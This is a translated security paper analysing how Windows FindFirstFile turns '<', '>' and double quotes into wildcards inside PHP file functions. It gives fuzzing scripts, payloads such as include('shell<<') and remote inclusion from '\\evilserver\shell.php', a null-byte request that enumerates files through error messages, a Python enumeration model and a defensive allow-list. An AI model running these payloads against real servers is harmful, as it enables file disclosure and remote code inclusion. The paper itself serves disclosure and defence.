Analysis of a PHP path brute-forcing problem triggered by a Windows file system mechanism (PHP example)

Source: Internet
Author: User
Tags: php, script, sql injection

1. Opening remarks

This disclosure is the result of testing the questions raised on the following web page:
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese

<?php
// Run on Windows in a directory that contains 1.php: try every byte value
// as the last character of the name and print the ones that still open it.
for ($i = 0; $i < 256; $i++) {
    $url = '1.ph' . chr($i);
    $tmp = @file_get_contents($url);
    if (!empty($tmp)) echo chr($i) . "\r\n";
}
?>

Given that 1.php exists, the script above finds that the following names can all be read back:

1.php
1.phP
1.ph<
1.ph>

The first two results were expected (the Windows file system is case-insensitive), but the other two caught our attention.
Tested PHP versions: PHP 4.9, 5.2, 5.3, 6.0
Tested systems: Windows XP SP3 x86, Windows XP SP2 x64, Windows 7, Windows 2003
From these tests we conclude that the vulnerability affects every tested Windows + PHP combination.

2. A closer look at the fuzzing results

To dig further into the bug, we modified the demo so that it tries every pair of bytes after "1.p":

<?php
// Fuzz the last two characters of the name: "1.p" followed by any two bytes.
for ($j = 0; $j < 256; $j++) {
    for ($i = 0; $i < 256; $i++) {
        $url = '1.p' . chr($j) . chr($i);
        $tmp = @file_get_contents($url);
        if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n";
    }
}
?>

By debugging the PHP interpreter, we traced this "magical" behaviour to the WinAPI function FindFirstFile() (http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx). Better still, while tracing the call stack we found that the character ">" is replaced with "?", the character "<" is replaced with "*", and the character '"' (double quote) is replaced with ".". This was already mentioned in a 2007 MSDN community comment: http://msdn.microsoft.com/en-us/library/community/history/aa364418%28v=vs.85%29.aspx?id=3
Yet no version of Windows released since has changed this behaviour!
It must be stressed that FindFirstFile() is reached by far more PHP functions than file_get_contents(). The functions affected by this bug are listed in the following table:

Table 1: affected PHP functions (the table is not reproduced on this page).

We also found that the behaviour can be exercised from C/C++ directly, using the example from MSDN:

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

int _tmain(int argc, TCHAR *argv[])
{
    WIN32_FIND_DATA FindFileData;
    HANDLE hFind;

    if (argc != 2)
    {
        _tprintf(TEXT("Usage: %s [target_file]\n"), argv[0]);
        return 1;
    }

    _tprintf(TEXT("Target file is %s\n"), argv[1]);
    /* The argument is passed to FindFirstFile() unchanged, so the "<", ">"
       and double-quote substitutions described above apply to it. */
    hFind = FindFirstFile(argv[1], &FindFileData);
    if (hFind == INVALID_HANDLE_VALUE)
    {
        printf("FindFirstFile failed (%lu)\n", (unsigned long)GetLastError());
        return 1;
    }
    else
    {
        _tprintf(TEXT("The first file found is %s\n"), FindFileData.cFileName);
        FindClose(hFind);
    }
    return 0;
}

Passing the argument "c:\bo<" makes this program find boot.ini.

3. Summary of exploitation methods

When FindFirstFile() is called, "<" is replaced with "*", so a "<" can stand for any number of characters. In testing, however, a single "<" does not always match what we expect (the kernel name matcher treats "<" as DOS_STAR, which matches only up to the final "." of a name), so to be sure of full "*" behaviour use "<<".
Example: include('shell<'); or include('shell<<'); When a directory contains more than one file whose name starts with "shell", the first one in alphabetical order is used.
When FindFirstFile() is called, ">" is replaced with "?", so ">" stands for exactly one arbitrary character.
Example: include('shell.p>p'); When more than one file matches the wildcard shell.p?p, the first one in alphabetical order is used.
When FindFirstFile() is called, '"' (double quote) is replaced with ".".
Example: include('shell"php'); ==> include('shell.php');
If the first character of the file name is ".", it can be omitted when the file is read.
Example: fopen('.htaccess'); ==> fopen('htaccess'); combined with the first rule this becomes fopen('h<<');
The end of a file name can be followed by any sequence of "/" and "\" characters, with "." characters mixed in, as long as the last character is ".".
Example: fopen("config.ini\\.//\/\/\/."); ==> fopen('config.ini\./.\.'); ==> fopen('config.ini/////.'); ==> fopen('config.ini...'); Translator's note: I do not really understand what this is used for. Truncation?
These functions can also open files on a network share, i.e. paths starting with "\\", which can be slow: if the share name does not exist, the file operation takes an extra 4 seconds, which may trigger a timeout and a max_execution_time error. Fortunately, the same trick bypasses allow_url_fopen=off and ultimately leads to remote file inclusion (RFI).
Example: include('\\\\evilserver\\shell.php'); (the doubled backslashes are PHP single-quote escaping for the path \\evilserver\shell.php)
The drive can also be switched inside a path in the following way:
include() with the path \\.\c:\my\file.php\..\..\d:\anotherfile.php
Drive-relative syntax can be chosen to bypass slash filtering:
file_get_contents('C:boot.ini'); ==> file_get_contents('C:/boot.ini'); (a drive-relative path is resolved against the current directory of that drive, so the two are equivalent when that directory is the root)
On the PHP command line (php.exe), reserved device names can be used in file names:
Example: file_get_contents('c:/tmp/con.jpg'); this reads from the CON device (0 bytes at a time, indefinitely) until it sees EOF.
Example: file_put_contents('C:/tmp/con.jpg', chr(0x07)); this makes the server beep continuously.

4. Further exploitation methods

Beyond the methods shown above, the following technique can be used to bypass a WAF or file name filtering.
Consider this example:

<?php
// Vulnerable pattern: the user-controlled name is concatenated into a path.
file_get_contents("/images/" . $_GET['a'] . ".jpg");
// Any other function from Table 1, e.g. include(), behaves the same way.
?>

Request test.php?a=../a<%00 (the %00 relies on null-byte truncation to drop the ".jpg" suffix, which PHP rejects from version 5.3.4 on).
Two kinds of result can occur:

Warning: include(/images/../a<) [function.include]: failed to open stream: Invalid argument
Warning: include(/images/../a<) [function.include]: failed to open stream: Permission denied ...

In the first case no file whose name starts with "a" exists; in the second case one does.

There are also records of sites throwing the following error:

Warning: include(/ADMIN_H1D3) [function.include]: failed to open stream: Permission denied ...

This shows that the directory contains at least one matching entry (file or folder), that the first of them is the folder admin_h1d3, and that the warning itself leaks the resolved name.
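The following Python model, added here as an example and not code from the original paper, puts the rules of section 3 and the blind enumeration of this section into runnable form. find_first_file() applies the three substitutions ("<" to "*", ">" to "?", '"' to ".") and the trailing dot/slash stripping, then returns the first alphabetical match, which is how the article describes FindFirstFile() behaving; enumerate_names() recovers every name in a directory using only the yes/no oracle that the "Invalid argument" versus "Permission denied" warnings provide. The listing SAMPLE_DIR and the DirectoryOracle class are constructed for the example; the matcher is the simplified one the article states, not the kernel's DOS_STAR/DOS_QM semantics (the subtlety behind the article's "<<" advice).

```python
import re
import string
from typing import Callable, List, Optional

# Substitutions the article attributes to FindFirstFile(). Only these three
# are modelled; the leading-dot rule is deliberately left out.
WILDCARD_MAP = str.maketrans({"<": "*", ">": "?", '"': "."})


def normalise_mask(mask: str) -> str:
    """Apply the substitutions and drop trailing '.', '/' and '\\' runs, so
    'config.ini/////.' and 'config.ini\\./.\\.' both become 'config.ini'."""
    return mask.translate(WILDCARD_MAP).rstrip("./\\")


def mask_to_regex(mask: str) -> "re.Pattern[str]":
    """Turn a '*'/'?' mask into an anchored, case-insensitive regex
    (Windows file names are case-insensitive, as the 1.phP result shows)."""
    parts = []
    for ch in mask:
        if ch == "*":
            parts.append(".*")
        elif ch == "?":
            parts.append(".")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def find_first_file(mask: str, entries: List[str]) -> Optional[str]:
    """First entry matching the mask in case-insensitive alphabetical order
    (the ordering the article observed), or None when nothing matches."""
    pattern = mask_to_regex(normalise_mask(mask))
    for name in sorted(entries, key=str.lower):
        if pattern.match(name):
            return name
    return None


class DirectoryOracle:
    """Simulated target (constructed for this example): answers 'does this
    mask resolve to something?' and counts the requests an attacker spent.
    Against a real site, __call__ would issue the HTTP request and classify
    the warning text instead."""

    def __init__(self, entries: List[str]) -> None:
        self.entries = list(entries)
        self.queries = 0

    def __call__(self, mask: str) -> bool:
        self.queries += 1
        return find_first_file(mask, self.entries) is not None


def enumerate_names(exists: Callable[[str], bool],
                    charset: str = string.ascii_lowercase + string.digits + "._-",
                    max_len: int = 64) -> List[str]:
    """Blind enumeration through '<': 'prefix' + c + '<' is 'prefix' + c + '*',
    so a True answer means some entry starts with that text. A depth-first
    walk over the charset recovers every name built from charset characters."""
    found: List[str] = []

    def walk(prefix: str) -> None:
        if len(prefix) > max_len:
            return
        # A prefix ending in '.' is normalised to the dotless name and would
        # be reported twice; Windows cannot create such names anyway.
        if prefix and not prefix.endswith(".") and exists(prefix):
            found.append(prefix)
        for ch in charset:
            if exists(prefix + ch + "<"):
                walk(prefix + ch)

    walk("")
    return found


# Constructed directory listing for the demonstration.
SAMPLE_DIR = ["index.php", "shell.php", "shell2.php", "admin_h1d3",
              "boot.ini", ".htaccess", "config.ini"]

if __name__ == "__main__":
    print(find_first_file("shell<<", SAMPLE_DIR))        # shell.php
    print(find_first_file('SHELL"php', SAMPLE_DIR))      # shell.php
    oracle = DirectoryOracle(SAMPLE_DIR)
    print(enumerate_names(oracle), "after", oracle.queries, "queries")
```

The query count printed by the demo is what makes the attack practical to estimate: each recovered character costs at most one request per charset symbol, which is the same budget the translator's directory-enumeration script would have spent against a live server.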

5. Conclusion
The experiment shows that PHP itself does not have that many vulnerabilities; what we see is that relying heavily on another layer (here a WinAPI behaviour) and passing input straight through to it produces subtle bugs and, ultimately, vulnerabilities. This broadens the scope of fuzzing (translator's note: not only the web layer, but down to the underlying system) and should eventually lead to updated IDS/IPS rules. Admittedly, code needs protecting and patches need applying and extending, but that is not our focus here. For now, we should be more careful and write stricter filtering rules, as we have been doing all along. There is still a long way to go.
Because the problem lies in the layer beneath the application, we suspect that similar problems occur in other web applications. We also tested MySQL 5, and found no similar vulnerability there, but we still expect similar vulnerabilities in interpreted languages such as Perl, Python and Ruby.
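As a concrete form of the "stricter filtering rules" the conclusion calls for, here is an added example (not from the original paper) of a hardened replacement for the vulnerable pattern file_get_contents("/images/" . $_GET['a'] . ".jpg") in section 4, written in Python so that it runs anywhere; the same allow-list would be a preg_match() plus an in_array() check in PHP. Instead of trying to strip "<", ">", '"', null bytes and path separators one by one, it accepts only names from a small allow-list, refuses the Windows reserved device names that the article shows reaching the CON device, and checks that the assembled path still lies inside the base directory. The base directory C:\site\images and the names in the demo are assumptions made for the example.

```python
import ntpath
import re

# Windows reserved device names: CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9.
# 'con' + '.jpg' still opens the CON device, so the bare name must be refused
# before the extension is appended.
RESERVED_NAMES = ({"CON", "PRN", "AUX", "NUL"}
                  | {"COM%d" % i for i in range(1, 10)}
                  | {"LPT%d" % i for i in range(1, 10)})

# Allow-list: letters, digits, underscore and hyphen only. This rejects the
# wildcard characters '<', '>', '"', '*', '?', path separators, drive
# colons, dots (so no '..' and no trailing '.') and spaces in one rule.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

IMAGE_BASE = "C:\\site\\images"   # assumed base directory for the example


def is_safe_image_name(name: str) -> bool:
    """True only for a bare file name the path-building code may use."""
    if not name or len(name) > 64:
        return False
    if any(ord(c) < 32 for c in name):     # NUL and other control bytes
        return False
    if not SAFE_NAME.match(name):
        return False
    if name.upper() in RESERVED_NAMES:
        return False
    return True


def safe_image_path(base_dir: str, user_name: str, ext: str = ".jpg") -> str:
    """Hardened equivalent of '/images/' . $_GET['a'] . '.jpg'.

    Raises ValueError instead of building a path from rejected input, and
    re-checks that the normalised result stays under base_dir even though the
    allow-list already makes traversal impossible (defence in depth)."""
    if not is_safe_image_name(user_name):
        raise ValueError("rejected file name: %r" % user_name)
    path = ntpath.join(base_dir, user_name + ext)
    root = ntpath.normpath(base_dir).lower() + "\\"
    if not ntpath.normpath(path).lower().startswith(root):
        raise ValueError("path escapes base directory")
    return path


def classify(names):
    """Map each candidate name to the verdict, handy for reviewing a WAF rule."""
    return {n: is_safe_image_name(n) for n in names}


if __name__ == "__main__":
    # Constructed inputs: the article's payloads next to a legitimate name.
    for n, ok in classify(["photo_01", "a<", "..\\a<", 'shell"php',
                           "con", "COM1", "a\x00b", "photo.jpg"]).items():
        print("%-12r %s" % (n, "accepted" if ok else "rejected"))
    print(safe_image_path(IMAGE_BASE, "photo_01"))
```

The allow-list is intentionally narrow; if real file names need dots or other characters, widen the character class but keep the reserved-name check and the containment check, since those cover the cases the article shows slipping past character-by-character deny-lists.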

6. References

PHP application source code auditing, advanced techniques:
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
MSDN FindFirstFile function reference:
http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx
MSDN community comment history:
http://msdn.microsoft.com/en-us/library/community/history/aa364418(v=vs.85).aspx?id=3
MSDN article "Naming Files, Paths, and Namespaces":
http://msdn.microsoft.com/en-us/library/aa365247(v=vs.85).aspx
TechNet article "Managing Files and Directories":
http://technet.microsoft.com/en-us/library/cc722482.aspx
Paper "Technique of quick exploitation of 2blind SQL injection":
http://www.exploit-db.com/papers/13696/

==================================================================
End of full text.
Note: This article is a white paper published at the end of 2011, and the bug still exists today. A few months ago, while doing a CTF at CUIT, I stumbled on a use of this bug; that was when I saw this article, but I only skimmed it roughly and wrote a PHP script to enumerate a directory. Having nothing to do this time, I have tidied up the translation.
